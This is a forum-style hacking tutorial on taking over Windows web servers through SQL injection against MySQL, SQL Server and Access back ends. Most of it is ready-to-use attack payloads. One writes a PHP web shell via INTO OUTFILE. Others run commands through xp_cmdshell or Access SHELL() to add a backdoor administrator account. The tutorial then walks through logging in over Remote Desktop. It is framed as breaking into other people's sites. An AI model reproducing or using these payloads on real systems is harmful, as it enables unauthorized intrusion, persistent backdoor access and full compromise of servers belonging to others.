owning windows server via sqli

                       ~~~~:::::BENZI Tutorials :::::~~~~~~

This tut will teach you how to get zero-access (root) on win servers.
TOC
-mysql
-sql server
-msaccess

mysql
conditions:
-magic quotes off
-you have the full path
-load_file privileges
**if you see error 13,stop injecting.

let say you found a vuln on site,and the n.o columns is 5.
for example-

Code:

site.com/index.php?id=1 union select 1,2,3,4,5

to know if its win server,do this

Code:

site.com/index.php?id=1 union select 1,2,version(),4,5

if you see something like

Quote:5.01.56-nt-log

its windows,because "nt".
you can also do

Code:

site.com/index.php?id=1 union select 1,2,@@version_compile_os,4,5

now
we will start injecting

Code:

union select 1,2,"<? system($_REQUEST['cmd']); ?>",4,5 INTO OUTFILE "/full/path/here/cmd.php"

explanation:
we have sent a request to run cmd commands into the file "cmd.php"
in the "/full/path/here" put the full path,something like
/home/some_user/public_html/site/index.php
now we go to our file
site.com/cmd.php
you will see the numbers 1,2,4,5 cause there are the union columns.
now for execute cmd commands,we do like this
site.com/cmd.php?cmd=[command here]
(the command "-is -la" returns all the files,for example)
now,we will add a new user.
site.com/cmd.php?cmd=net user uname upass /add
user added.
site.com/cmd.php?cmd=net localgroup administrators uname /add
we added our user to the admins.
now goto start > cmd 
and ping the site
ping site.com
now you will see "Pinging ... [ip.ip.ip.ip] with 32 bytes of data:
now,goto strat > all programs > accessories > remote desktop connection
and type the ip from the ping
login with the user&pass we added
Pwnd..

sql server
conditions:
-win server 2000/3
-exec on

this process is shorter,cause we can run cmd commands with xp_cmdshell.
lets start
let say we know the file index.php is vuln,for example

Code:

site.com/index.asp?id=1

so we do this

Code:

site.com/index.asp?id=(select+@@version)

and we will get an error like that

Quote:Syntax error...value 'microsoft sql server 2000....' to .....int.

so we know that the server is microsoft sql server 2000.
now,to run a cmd command,we do this

Code:

site.com/index.asp?id=1;exec+master..xp_cmdshell 'net user uname upass /add'--

**note: if you get error,try this

Code:

site.com/index.asp?id=1;exec+master..xp_cmdshell "net user uname upass /add"--)

now,lets add our user to the admins.

Code:

site.com/index.asp?id=1;exec+master..xp_cmdshell 'net localgroup administrators uname /add'--

now,exactly as before,goto start > cmd 
and ping the site
ping site.com
now you will see "Pinging ... [ip.ip.ip.ip] with 32 bytes of data:
now,goto strat > all programs > accessories > remote desktop connection
and type the ip from the ping
login with the user&pass we added
Pwnd..

ACCESS
conditions:
-JET db
msaccess is no so different than sql server.
if we know that the file index.asp is vuln,we do this to run cmd commands:

Code:

site.com/index.asp?id=1 AND SHELL('cmd.exe /c net user uname upass /add')

user added.

Code:

site.com/index.asp?id=1 AND SHELL('cmd.exe /c net localgroup administrators uname /add')

user added to the admins.
goto start > cmd 
and ping the site
ping site.com
now you will see "Pinging ... [ip.ip.ip.ip] with 32 bytes of data:
now,goto strat > all programs > accessories > remote desktop connection
and type the ip from the ping
login with the user&pass we added
Pwnd..

hope you learned something 

Posted in SQlbasics , SQLINJECTION